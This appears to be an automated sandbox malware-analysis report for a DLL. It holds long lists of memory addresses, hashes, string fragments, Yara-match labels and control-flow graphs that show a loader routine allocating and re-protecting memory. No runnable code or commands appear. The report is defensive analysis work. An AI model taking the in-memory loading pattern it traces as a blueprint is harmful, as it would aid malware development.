                                                                                                        0x7ffc123e88bf
                                                                                                        0x7ffc123e88c7
                                                                                                        0x7ffc123e88cf
                                                                                                        0x7ffc123e88d7
                                                                                                        0x7ffc123e88df
                                                                                                        0x7ffc123e88e7
                                                                                                        0x7ffc123e88ef
                                                                                                        0x7ffc123e88f7
                                                                                                        0x7ffc123e88ff
                                                                                                        0x7ffc123e8907
                                                                                                        0x7ffc123e890f
                                                                                                        0x7ffc123e8917
                                                                                                        0x7ffc123e891f
                                                                                                        0x7ffc123e8927
                                                                                                        0x7ffc123e892f
                                                                                                        0x7ffc123e8937
                                                                                                        0x7ffc123e893f
                                                                                                        0x7ffc123e8947
                                                                                                        0x7ffc123e894f
                                                                                                        0x7ffc123e8957
                                                                                                        0x7ffc123e895f
                                                                                                        0x7ffc123e8967
                                                                                                        0x7ffc123e896f
                                                                                                        0x7ffc123e8977
                                                                                                        0x7ffc123e897f
                                                                                                        0x7ffc123e8987
                                                                                                        0x7ffc123e898f
                                                                                                        0x7ffc123e8997
                                                                                                        0x7ffc123e899f
                                                                                                        0x7ffc123e89a7
                                                                                                        0x7ffc123e89af
                                                                                                        0x7ffc123e89b7
                                                                                                        0x7ffc123e89bf
                                                                                                        0x7ffc123e89c7
                                                                                                        0x7ffc123e89cf
                                                                                                        0x7ffc123e89d7
                                                                                                        0x7ffc123e89df
                                                                                                        0x7ffc123e89e7
                                                                                                        0x7ffc123e89ef
                                                                                                        0x7ffc123e89f7
                                                                                                        0x7ffc123e89ff
                                                                                                        0x7ffc123e8a07
                                                                                                        0x7ffc123e8a0f
                                                                                                        0x7ffc123e8a17
                                                                                                        0x7ffc123e8a1f
                                                                                                        0x7ffc123e8a27
                                                                                                        0x7ffc123e8a2f
                                                                                                        0x7ffc123e8a37
                                                                                                        0x7ffc123e8a3f
                                                                                                        0x7ffc123e8a47
                                                                                                        0x7ffc123e8a4f
                                                                                                        0x7ffc123e8a57
                                                                                                        0x7ffc123e8a5f
                                                                                                        0x7ffc123e8a67
                                                                                                        0x7ffc123e8a6f
                                                                                                        0x7ffc123e8a77
                                                                                                        0x7ffc123e8a7f
                                                                                                        0x7ffc123e8a87
                                                                                                        0x7ffc123e8a8f
                                                                                                        0x7ffc123e8a97
                                                                                                        0x7ffc123e8a9f
                                                                                                        0x7ffc123e8aa7
                                                                                                        0x7ffc123e8aaf
                                                                                                        0x7ffc123e8ab7
                                                                                                        0x7ffc123e8abf
                                                                                                        0x7ffc123e8ac7
                                                                                                        0x7ffc123e8acf
                                                                                                        0x7ffc123e8ad7
                                                                                                        0x7ffc123e8adf
                                                                                                        0x7ffc123e8ae7
                                                                                                        0x7ffc123e8aef
                                                                                                        0x7ffc123e8af7
                                                                                                        0x7ffc123e8aff
                                                                                                        0x7ffc123e8b07
                                                                                                        0x7ffc123e8b0f
                                                                                                        0x7ffc123e8b17
                                                                                                        0x7ffc123e8b1f
                                                                                                        0x7ffc123e8b27
                                                                                                        0x7ffc123e8b2f
                                                                                                        0x7ffc123e8b37
                                                                                                        0x7ffc123e8b3f
                                                                                                        0x7ffc123e8b47
                                                                                                        0x7ffc123e8b4f
                                                                                                        0x7ffc123e8b57
                                                                                                        0x7ffc123e8b5f
                                                                                                        0x7ffc123e8b67
                                                                                                        0x7ffc123e8b6f
                                                                                                        0x7ffc123e8b77
                                                                                                        0x7ffc123e8b7f
                                                                                                        0x7ffc123e8b87
                                                                                                        0x7ffc123e8b8f
                                                                                                        0x7ffc123e8b97
                                                                                                        0x7ffc123e8b9f
                                                                                                        0x7ffc123e8ba7
                                                                                                        0x7ffc123e8baf
                                                                                                        0x7ffc123e8bb7
                                                                                                        0x7ffc123e8bbf
                                                                                                        0x7ffc123e8bc7
                                                                                                        0x7ffc123e8bcf
                                                                                                        0x7ffc123e8bd7
                                                                                                        0x7ffc123e8bdf
                                                                                                        0x7ffc123e8be7
                                                                                                        0x7ffc123e8bef
                                                                                                        0x7ffc123e8bf7
                                                                                                        0x7ffc123e8bff
                                                                                                        0x7ffc123e8c07
                                                                                                        0x7ffc123e8c0f
                                                                                                        0x7ffc123e8c17
                                                                                                        0x7ffc123e8c1f
                                                                                                        0x7ffc123e8c27
                                                                                                        0x7ffc123e8c2f
                                                                                                        0x7ffc123e8c37
                                                                                                        0x7ffc123e8c3f
                                                                                                        0x7ffc123e8c47
                                                                                                        0x7ffc123e8c4f
                                                                                                        0x7ffc123e8c57
                                                                                                        0x7ffc123e8c5f
                                                                                                        0x7ffc123e8c67
                                                                                                        0x7ffc123e8c6f
                                                                                                        0x7ffc123e8c77
                                                                                                        0x7ffc123e8c7f
                                                                                                        0x7ffc123e8c87
                                                                                                        0x7ffc123e8c8f
                                                                                                        0x7ffc123e8c97
                                                                                                        0x7ffc123e8c9f
                                                                                                        0x7ffc123e8ca7
                                                                                                        0x7ffc123e8caf
                                                                                                        0x7ffc123e8cb7
                                                                                                        0x7ffc123e8cbf
                                                                                                        0x7ffc123e8cc7
                                                                                                        0x7ffc123e8ccf
                                                                                                        0x7ffc123e8cd7
                                                                                                        0x7ffc123e8cdf
                                                                                                        0x7ffc123e8ce7
                                                                                                        0x7ffc123e8cef
                                                                                                        0x7ffc123e8cf7
                                                                                                        0x7ffc123e8cff
                                                                                                        0x7ffc123e8d07
                                                                                                        0x7ffc123e8d0f
                                                                                                        0x7ffc123e8d17
                                                                                                        0x7ffc123e8d1f
                                                                                                        0x7ffc123e8d27
                                                                                                        0x7ffc123e8d2f
                                                                                                        0x7ffc123e8d37
                                                                                                        0x7ffc123e8d3f
                                                                                                        0x7ffc123e8d47
                                                                                                        0x7ffc123e8d4f
                                                                                                        0x7ffc123e8d57
                                                                                                        0x7ffc123e8d5f
                                                                                                        0x7ffc123e8d67
                                                                                                        0x7ffc123e8d6f
                                                                                                        0x7ffc123e8d77
                                                                                                        0x7ffc123e8d7f
                                                                                                        0x7ffc123e8d87
                                                                                                        0x7ffc123e8d8f
                                                                                                        0x7ffc123e8d97
                                                                                                        0x7ffc123e8d9f
                                                                                                        0x7ffc123e8da7
                                                                                                        0x7ffc123e8daf
                                                                                                        0x7ffc123e8db7
                                                                                                        0x7ffc123e8dbf
                                                                                                        0x7ffc123e8dc7
                                                                                                        0x7ffc123e8dcf
                                                                                                        0x7ffc123e8dd7
                                                                                                        0x7ffc123e8ddf
                                                                                                        0x7ffc123e8de7
                                                                                                        0x7ffc123e8def
                                                                                                        0x7ffc123e8df7
                                                                                                        0x7ffc123e8dff
                                                                                                        0x7ffc123e8e07
                                                                                                        0x7ffc123e8e0f
                                                                                                        0x7ffc123e8e17
                                                                                                        0x7ffc123e8e1f
                                                                                                        0x7ffc123e8e27
                                                                                                        0x7ffc123e8e2f
                                                                                                        0x7ffc123e8e37
                                                                                                        0x7ffc123e8e3f
                                                                                                        0x7ffc123e8e47
                                                                                                        0x7ffc123e8e4f
                                                                                                        0x7ffc123e8e57
                                                                                                        0x7ffc123e8e5f
                                                                                                        0x7ffc123e8e67
                                                                                                        0x7ffc123e8e6f
                                                                                                        0x7ffc123e8e77
                                                                                                        0x7ffc123e8e7f
                                                                                                        0x7ffc123e8e87
                                                                                                        0x7ffc123e8e8f
                                                                                                        0x7ffc123e8e97
                                                                                                        0x7ffc123e8e9f
                                                                                                        0x7ffc123e8ea7
                                                                                                        0x7ffc123e8eaf
                                                                                                        0x7ffc123e8eb7
                                                                                                        0x7ffc123e8ebf
                                                                                                        0x7ffc123e8ec7
                                                                                                        0x7ffc123e8ecf
                                                                                                        0x7ffc123e8ed7
                                                                                                        0x7ffc123e8edf
                                                                                                        0x7ffc123e8ee7
                                                                                                        0x7ffc123e8eef
                                                                                                        0x7ffc123e8ef7
                                                                                                        0x7ffc123e8eff
                                                                                                        0x7ffc123e8f07
                                                                                                        0x7ffc123e8f0f
                                                                                                        0x7ffc123e8f17
                                                                                                        0x7ffc123e8f1f
                                                                                                        0x7ffc123e8f27
                                                                                                        0x7ffc123e8f2f
                                                                                                        0x7ffc123e8f37
                                                                                                        0x7ffc123e8f3f
                                                                                                        0x7ffc123e8f47
                                                                                                        0x7ffc123e8f4f
                                                                                                        0x7ffc123e8f57
                                                                                                        0x7ffc123e8f5f
                                                                                                        0x7ffc123e8f67
                                                                                                        0x7ffc123e8f6f
                                                                                                        0x7ffc123e8f77
                                                                                                        0x7ffc123e8f7f
                                                                                                        0x7ffc123e8f87
                                                                                                        0x7ffc123e8f8f
                                                                                                        0x7ffc123e8f97
                                                                                                        0x7ffc123e8f9f
                                                                                                        0x7ffc123e8fa7
                                                                                                        0x7ffc123e8faf
                                                                                                        0x7ffc123e8fb7
                                                                                                        0x7ffc123e8fbf
                                                                                                        0x7ffc123e8fc7
                                                                                                        0x7ffc123e8fcf
                                                                                                        0x7ffc123e8fd7
                                                                                                        0x7ffc123e8fdf
                                                                                                        0x7ffc123e8fe7
                                                                                                        0x7ffc123e8fef
                                                                                                        0x7ffc123e8ff7
                                                                                                        0x7ffc123e8fff
                                                                                                        0x7ffc123e9007
                                                                                                        0x7ffc123e900f
                                                                                                        0x7ffc123e9017
                                                                                                        0x7ffc123e901f
                                                                                                        0x7ffc123e9027
                                                                                                        0x7ffc123e902f
                                                                                                        0x7ffc123e9037
                                                                                                        0x7ffc123e903f
                                                                                                        0x7ffc123e9047
                                                                                                        0x7ffc123e904f
                                                                                                        0x7ffc123e9057
                                                                                                        0x7ffc123e905f
                                                                                                        0x7ffc123e9067
                                                                                                        0x7ffc123e906f
                                                                                                        0x7ffc123e9077
                                                                                                        0x7ffc123e907f
                                                                                                        0x7ffc123e9087
                                                                                                        0x7ffc123e908f
                                                                                                        0x7ffc123e9097
                                                                                                        0x7ffc123e909f
                                                                                                        0x7ffc123e90a7
                                                                                                        0x7ffc123e90af
                                                                                                        0x7ffc123e90b7
                                                                                                        0x7ffc123e90bf
                                                                                                        0x7ffc123e90c7
                                                                                                        0x7ffc123e90cf
                                                                                                        0x7ffc123e90d7
                                                                                                        0x7ffc123e90df
                                                                                                        0x7ffc123e90e7
                                                                                                        0x7ffc123e90ef
                                                                                                        0x7ffc123e90f7
                                                                                                        0x7ffc123e90ff
                                                                                                        0x7ffc123e9107
                                                                                                        0x7ffc123e910f
                                                                                                        0x7ffc123e9117
                                                                                                        0x7ffc123e911f
                                                                                                        0x7ffc123e9127
                                                                                                        0x7ffc123e912f
                                                                                                        0x7ffc123e9137
                                                                                                        0x7ffc123e913f
                                                                                                        0x7ffc123e9147
                                                                                                        0x7ffc123e914f
                                                                                                        0x7ffc123e9157
                                                                                                        0x7ffc123e915f
                                                                                                        0x7ffc123e9167
                                                                                                        0x7ffc123e916f
                                                                                                        0x7ffc123e9177
                                                                                                        0x7ffc123e917f
                                                                                                        0x7ffc123e9187
                                                                                                        0x7ffc123e918f
                                                                                                        0x7ffc123e9197
                                                                                                        0x7ffc123e919f
                                                                                                        0x7ffc123e91a7
                                                                                                        0x7ffc123e91af
                                                                                                        0x7ffc123e91b7
                                                                                                        0x7ffc123e91bf
                                                                                                        0x7ffc123e91c7
                                                                                                        0x7ffc123e91cf
                                                                                                        0x7ffc123e91d7
                                                                                                        0x7ffc123e91df
                                                                                                        0x7ffc123e91e7
                                                                                                        0x7ffc123e91f8
                                                                                                        0x7ffc123e9200
                                                                                                        0x7ffc123e9205
                                                                                                        0x7ffc123e9212
                                                                                                        0x7ffc123e921a
                                                                                                        0x7ffc123e9224
                                                                                                        0x7ffc123e923e
                                                                                                        0x7ffc123e9240
                                                                                                        0x7ffc123e9248
                                                                                                        0x7ffc123e924a
                                                                                                        0x7ffc123e9257
                                                                                                        0x7ffc123e9263
                                                                                                        0x7ffc123e9270
                                                                                                        0x7ffc123e9275
                                                                                                        0x7ffc123e927c
                                                                                                        0x7ffc123e9287
                                                                                                        0x7ffc123e928e
                                                                                                        0x7ffc123e9294
                                                                                                        0x7ffc123e929d
                                                                                                        0x7ffc123e929f
                                                                                                        0x7ffc123e92a2
                                                                                                        0x7ffc123e92ae
                                                                                                        0x7ffc123e92b6
                                                                                                        0x7ffc123e92bb
                                                                                                        0x7ffc123e92d5
                                                                                                        0x7ffc123e92db
                                                                                                        0x7ffc123e92f5
                                                                                                        0x7ffc123e9303
                                                                                                        0x7ffc123e931e
                                                                                                        0x7ffc123e9320
                                                                                                        0x7ffc123e9328
                                                                                                        0x7ffc123e932d
                                                                                                        0x7ffc123e9330
                                                                                                        0x7ffc123e9342
                                                                                                        0x7ffc123e9358
                                                                                                        0x7ffc123e935f
                                                                                                        0x7ffc123e936a
                                                                                                        0x7ffc123e9370
                                                                                                        0x7ffc123e9372
                                                                                                        0x7ffc123e9380
                                                                                                        0x7ffc123e9382
                                                                                                        0x7ffc123e9391
                                                                                                        0x7ffc123e9396
                                                                                                        0x7ffc123e939e
                                                                                                        0x7ffc123e93a5
                                                                                                        0x7ffc123e93b8
                                                                                                        0x7ffc123e93bd
                                                                                                        0x7ffc123e93d0
                                                                                                        0x7ffc123e93d5
                                                                                                        0x7ffc123e93e1
                                                                                                        0x7ffc123e9401

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                                                                                        • API String ID: 0-872547024
                                                                                                        • Opcode ID: 9f6855dc5e86c112bd17ecc3a2cb65eeebb789395a572ccb48363b4ef019005b
                                                                                                        • Instruction ID: e990dfc24dcd993d6c5fcabd38f9682c1c58c6edc2ec7c4cd2650d3a35d29837
                                                                                                        • Opcode Fuzzy Hash: 9f6855dc5e86c112bd17ecc3a2cb65eeebb789395a572ccb48363b4ef019005b
                                                                                                        • Instruction Fuzzy Hash: 10A35E1250DBC5C9E332C23CA4587CFAE8193A3319F484299D3E41AADBC7AE8155DF67
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 53 1b000130000-1b00013029a call 1b00013091c * 2 66 1b0001302a0-1b0001302a4 53->66 67 1b000130905 53->67 66->67 68 1b0001302aa-1b0001302ae 66->68 69 1b000130907-1b00013091a 67->69 68->67 70 1b0001302b4-1b0001302b8 68->70 70->67 71 1b0001302be-1b0001302c5 70->71 71->67 72 1b0001302cb-1b0001302dc 71->72 72->67 73 1b0001302e2-1b0001302eb 72->73 73->67 74 1b0001302f1-1b0001302fc 73->74 74->67 75 1b000130302-1b000130312 74->75 76 1b000130314-1b00013031a 75->76 77 1b00013033f-1b000130371 GetNativeSystemInfo 75->77 78 1b00013031c-1b000130324 76->78 77->67 79 1b000130377-1b000130393 VirtualAlloc 77->79 80 1b000130326-1b00013032a 78->80 81 1b00013032c-1b00013032d 78->81 82 1b000130395-1b0001303a8 79->82 83 1b0001303aa-1b0001303ae 79->83 86 1b00013032f-1b00013033d 80->86 81->86 82->83 84 1b0001303b0-1b0001303c2 83->84 85 1b0001303dc-1b0001303e3 83->85 87 1b0001303d4-1b0001303d8 84->87 88 1b0001303e5-1b0001303f9 85->88 89 1b0001303fb-1b000130417 85->89 86->77 86->78 91 1b0001303c4-1b0001303d1 87->91 92 1b0001303da 87->92 88->88 88->89 93 1b000130419-1b00013041a 89->93 94 1b000130458-1b000130465 89->94 91->87 92->89 95 1b00013041c-1b000130422 93->95 96 1b000130537-1b000130542 94->96 97 1b00013046b-1b000130472 94->97 98 1b000130424-1b000130446 95->98 99 1b000130448-1b000130456 95->99 100 1b0001306e6-1b0001306ed 96->100 101 1b000130548-1b000130559 96->101 97->96 102 1b000130478-1b000130485 97->102 98->98 98->99 99->94 99->95 105 1b0001306f3-1b000130707 100->105 106 1b0001307ac-1b0001307c3 100->106 103 1b000130562-1b000130565 101->103 102->96 104 1b00013048b-1b00013048f 102->104 111 1b000130567-1b000130574 103->111 112 1b00013055b-1b00013055f 103->112 113 1b00013051b-1b000130525 104->113 107 1b0001307a9-1b0001307aa 105->107 108 1b00013070d 105->108 109 1b00013087a-1b00013088d 106->109 110 1b0001307c9-1b0001307cd 106->110 107->106 116 1b000130712-1b000130736 108->116 133 1b0001308b3-1b0001308ba 109->133 134 1b00013088f-1b00013089a 109->134 117 1b0001307d0-1b0001307d3 110->117 114 1b00013057a-1b00013057d 111->114 115 1b00013060d-1b000130619 111->115 112->103 118 1b000130494-1b0001304a8 113->118 119 1b00013052b-1b000130531 113->119 114->115 122 1b000130583-1b00013059b 114->122 126 1b0001306e2-1b0001306e3 115->126 127 1b00013061f 115->127 143 1b000130796-1b00013079f 116->143 144 1b000130738-1b00013073e 116->144 124 1b0001307d9-1b0001307e9 117->124 125 1b00013085f-1b00013086d 117->125 120 1b0001304aa-1b0001304cd 118->120 121 1b0001304cf-1b0001304d3 118->121 119->96 119->104 128 1b000130518-1b000130519 120->128 129 1b0001304e3-1b0001304e7 121->129 130 1b0001304d5-1b0001304e1 121->130 122->115 131 1b00013059d-1b00013059e 122->131 135 1b0001307eb-1b0001307ed 124->135 136 1b00013080d-1b00013080f 124->136 125->117 138 1b000130873-1b000130874 125->138 126->100 137 1b000130625-1b000130648 127->137 128->113 141 1b0001304e9-1b0001304fc 129->141 142 1b0001304fe-1b000130502 129->142 139 1b000130511-1b000130515 130->139 140 1b0001305a0-1b000130605 131->140 148 1b0001308eb-1b000130903 133->148 149 1b0001308bc-1b0001308c4 133->149 145 1b0001308ab-1b0001308b1 134->145 146 1b0001307fb-1b00013080b 135->146 147 1b0001307ef-1b0001307f9 135->147 150 1b000130822-1b00013082b 136->150 151 1b000130811-1b000130820 136->151 164 1b0001306b2-1b0001306b7 137->164 165 1b00013064a-1b00013064b 137->165 138->109 139->128 140->140 154 1b000130607 140->154 141->139 142->128 152 1b000130504-1b00013050e 142->152 143->116 160 1b0001307a5-1b0001307a6 143->160 155 1b000130740-1b000130746 144->155 156 1b000130748-1b000130754 144->156 145->133 157 1b00013089c-1b0001308a8 145->157 153 1b00013082e-1b00013083d 146->153 147->153 148->69 149->148 159 1b0001308c6-1b0001308e9 RtlAvlRemoveNode 149->159 150->153 151->153 152->139 166 1b00013084b-1b00013085c VirtualProtect 153->166 167 1b00013083f-1b000130845 153->167 154->115 161 1b00013077b-1b00013078d 155->161 162 1b000130756-1b000130757 156->162 163 1b000130764-1b000130776 156->163 157->145 159->148 160->107 161->143 180 1b00013078f-1b000130794 161->180 172 1b000130759-1b000130762 162->172 163->161 169 1b0001306b9-1b0001306bd 164->169 170 1b0001306ce-1b0001306d8 164->170 173 1b00013064e-1b000130651 165->173 166->125 167->166 169->170 174 1b0001306bf-1b0001306c3 169->174 170->137 175 1b0001306de-1b0001306df 170->175 172->163 172->172 177 1b000130653-1b000130659 173->177 178 1b00013065b-1b000130666 173->178 174->170 179 1b0001306c5 174->179 175->126 181 1b00013068d-1b0001306a3 177->181 182 1b000130676-1b000130688 178->182 183 1b000130668-1b000130669 178->183 179->170 180->144 186 1b0001306a5-1b0001306aa 181->186 187 1b0001306ac 181->187 182->181 184 1b00013066b-1b000130674 183->184 184->182 184->184 186->173 187->164
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279089523.000001B000130000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B000130000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1b000130000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocInfoNativeNodeProtectRemoveSystem
                                                                                                        • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                        • API String ID: 1419936716-3605381585
                                                                                                        • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction ID: 4398968fae23108bba957e3bb9596048f4b3da1f661b463c8d4c6705b4234616
                                                                                                        • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction Fuzzy Hash: B162D430618B4C8BD75AEF18D8957EAB7E0FB5C304F14462DE48AC7261EB34E546CB86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 469 180004ddc-180004e09 470 180004e0b 469->470 471 180004e10-180004e12 470->471 472 180004e18-180004e1e 471->472 473 1800050ff-1800051e5 call 180028b8c 471->473 474 180004e24-180004e2a 472->474 475 180005017-1800050fa call 180009144 * 2 472->475 485 1800051f6 473->485 486 1800051e7-1800051f1 473->486 478 1800052e9-180005382 call 18001fa08 * 2 474->478 479 180004e30-180004e36 474->479 475->470 497 180005387-180005391 478->497 483 180005211-1800052e4 call 180005ca8 479->483 484 180004e3c-180004e42 479->484 483->497 489 180004e48-180004f3f call 18000eac4 call 1800212dc 484->489 490 180005200-180005206 484->490 491 1800051fb 485->491 486->470 501 180004f44-180005012 call 180002094 489->501 490->497 498 18000520c 490->498 491->490 498->471 501->491
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @_$Q+$w$+$3C$u
                                                                                                        • API String ID: 0-4152583413
                                                                                                        • Opcode ID: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
                                                                                                        • Instruction ID: b6ea412dc30f19c74fb4b1663690e8dc750e0b49b1240d0c045de5a6b9424b82
                                                                                                        • Opcode Fuzzy Hash: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
                                                                                                        • Instruction Fuzzy Hash: 7D02F67151038DEFDB98DF24C889ADD3BA1FB58398F952219FC0A972A0C774D985CB84
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 3m$SW$rS$r$t.?8
                                                                                                        • API String ID: 0-4220278859
                                                                                                        • Opcode ID: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
                                                                                                        • Instruction ID: 5729ab1ff226baa14ab4ffc9551888db56205bfd96deea9119b6bbc9091883bb
                                                                                                        • Opcode Fuzzy Hash: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
                                                                                                        • Instruction Fuzzy Hash: F2C1EF7151A784ABD388DF28C5CA95BBBE1FBC4744F906A1DF496862A0D7B4D908CF02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
